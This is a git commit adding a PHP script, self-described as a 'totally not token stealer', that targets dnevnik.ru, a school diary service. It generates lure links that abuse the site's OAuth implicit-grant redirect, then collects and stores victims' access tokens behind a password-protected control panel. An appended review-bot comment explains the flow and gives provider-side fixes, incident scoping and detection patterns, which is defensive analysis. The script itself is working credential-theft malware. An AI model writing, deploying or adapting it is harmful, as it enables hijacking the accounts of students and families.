initial

2026-05-28 15:03:31 +03:00
commit ce0d14bd77
9 changed files with 1537 additions and 0 deletions

243
script.php Normal file

@@ -0,0 +1,243 @@
<?php
// totally not token stealer
// for dnevnik.ru
// =========================
// by ktkz for tmb project
// 2026
// go to .php?control to open control panel
// ===CONFIG===
const PANEL_PASSWORD = "TOTALLYNOTSTEALERpassword1";
const DATA_FILE_PATH = "./totallynotstealeddata.php";
const AUTH_URL = "https://login.dnevnik.ru/login/?ReturnUrl=";
const OAUTH_URL = "https://login.dnevnik.ru/oauth2?response_type=token&client_id=b8006d75-70a9-4291-885c-13d8511bb2ae&scope=CommonInfo,EducationalInfo,FriendsAndRelatives&redirect_uri=";
// ============
// ===PAGES===
// NOTE: contains ai-generated styles and mine shitty while state-of-art template system
// we use builder to mount these
function LOGIN_PAGE(string $data)
{
return "<<BUILDER_MOUNT_FILE_(.\dev\html\login.html)>>";
}
function CONTROL_PAGE(string $data)
{
return "<<BUILDER_MOUNT_FILE_(.\dev\html\control.html)>>";
}
// ===========
// PREPARATION
if (!file_exists(DATA_FILE_PATH)) {
file_put_contents(
DATA_FILE_PATH,
'<?php // { "name": "tnts", "version": 1, "data": [] }',
);
}
// ROUTER
function path(string $p)
{
return count($_GET) > 0 && array_keys($_GET)[0] == $p;
}
if (path("control")) {
if (!isset($_GET["l"]) || $_GET["l"] == "") {
echo LOGIN_PAGE("{}");
exit();
}
if ($_GET["l"] != PANEL_PASSWORD) {
echo LOGIN_PAGE('{error: "wrong password"}');
exit();
}
// user authorized
if (!in_array("do", array_keys($_GET))) {
$config = readConfig();
$error = "";
if (isset($_GET["error"])) {
$error = $_GET["error"];
}
echo CONTROL_PAGE(
json_encode([
"password" => $_GET["l"],
"data" => $config,
"error" => $error,
]),
);
exit();
}
}
function readConfig()
{
$_ = json_decode(
str_replace("<?php // ", "", file_get_contents(DATA_FILE_PATH)),
true,
);
if ($_["name"] != "tnts" || !isset($_["data"])) {
exit();
}
return $_["data"];
}
function saveConfig(array $config)
{
$_ = ["name" => "tnts", "version" => 1, "data" => $config];
file_put_contents(DATA_FILE_PATH, "<?php // " . json_encode($_));
}
// config type
// {
// {
// "name": string,
// "url": string,
// "comment": string?,
// "token": string?
// }
// }
//
// define status by token presence
if (
isset($_GET["do"]) &&
$_GET["do"] === "create" &&
isset($_GET["url"]) &&
isset($_GET["name"])
) {
if (!isset($_GET["l"]) || $_GET["l"] == "" || $_GET["l"] != PANEL_PASSWORD) {
exit();
}
// create link
$url = $_GET["url"];
$name = $_GET["name"];
$comment = $_GET["comment"] ?? null;
$config = readConfig();
$matches = array_values(
array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] === $name,
),
);
if (count($matches) != 0) {
header(
"Location: " .
parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
"?control&l=" .
$_GET["l"] .
"&error=" .
urlencode("url already exists"),
true,
302,
);
exit();
}
$config[] = [
"name" => $name,
"url" => $url,
"comment" => $comment,
"token" => null,
];
saveConfig($config);
header(
"Location: " .
parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
"?control&l=" .
$_GET["l"],
true,
302,
);
}
if (isset($_GET["do"]) && $_GET["do"] === "delete" && isset($_GET["delete"])) {
if (!isset($_GET["l"]) || $_GET["l"] == "" || $_GET["l"] != PANEL_PASSWORD) {
exit();
}
$name = $_GET["delete"];
$config = readConfig();
$config = array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] != $name,
);
saveConfig($config);
header(
"Location: " .
parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
"?control&l=" .
$_GET["l"],
true,
302,
);
exit();
}
function getBaseUrl(): string
{
$scheme =
!empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http";
$host = $_SERVER["HTTP_HOST"] ?? ($_SERVER["SERVER_NAME"] ?? "");
$script = $_SERVER["SCRIPT_NAME"] ?? ($_SERVER["PHP_SELF"] ?? "");
return $scheme . "://" . $host . $script;
}
if (isset($_GET["go"])) {
$config = readConfig();
$matches = array_values(
array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] == $_GET["go"],
),
);
if (count($matches) == 0) {
exit();
}
$goUrl = getBaseUrl() . "?callback&name=" . $_GET["go"];
$redirect = AUTH_URL . rawurlencode(OAUTH_URL . rawurlencode($goUrl));
header("Location: " . $redirect, true, 302);
exit();
}
if (path("info")) {
header("Content-type: application/json");
echo json_encode([
"name" => "totally not token stealer",
"version" => "1.0.0",
"author" => "ktkz",
]);
}
if (path("callback") && isset($_GET["name"])) {
$base = parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH);
$config = readConfig();
$matches = array_values(
array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] == $_GET["name"],
),
);
if (count($matches) == 0) {
exit();
}
$send_url = $base . "?send&name=" . $_GET["name"];
$redirect_url = $matches[0]["url"];
echo "<<BUILDER_MOUNT_FILE_(.\dev\html\callback.html)>>";
exit();
}
if (path("send") && isset($_GET["name"]) && isset($_GET["token"])) {
$config = readConfig();
$matches = array_values(
array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] == $_GET["name"],
),
);
if (count($matches) == 0) {
exit();
}
$config[array_search($matches[0], $config)]["token"] = $_GET["token"];
saveConfig($config);
}
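Review bot: The `send` branch at the end of the file writes `$_GET["token"]` into `DATA_FILE_PATH` for the matching link name with no authentication, and the `go` branch builds the authorization redirect (`AUTH_URL` + `OAUTH_URL` with `response_type=token` and this script as `redirect_uri`) that feeds it, so the file is a relay for collecting other users' dnevnik.ru access tokens and should be rejected rather than hardened. The flow appears to depend on the client_id in `OAUTH_URL` accepting a `redirect_uri` outside its registered set together with the implicit grant; on the provider side, exact-match redirect allow-listing and retiring `response_type=token` for that client would close it. For incident scoping, the captured token travels in the query string (`?send&name=…&token=…`) and is persisted in `DATA_FILE_PATH`, so web-server access logs and that file identify the accounts whose tokens need revoking. Requests whose first query key is `go`, `callback` or `send` together with a `name` parameter are the request pattern this script exposes for detection; the mounted `callback.html` is not visible here, so how the token reaches `send` is inferred.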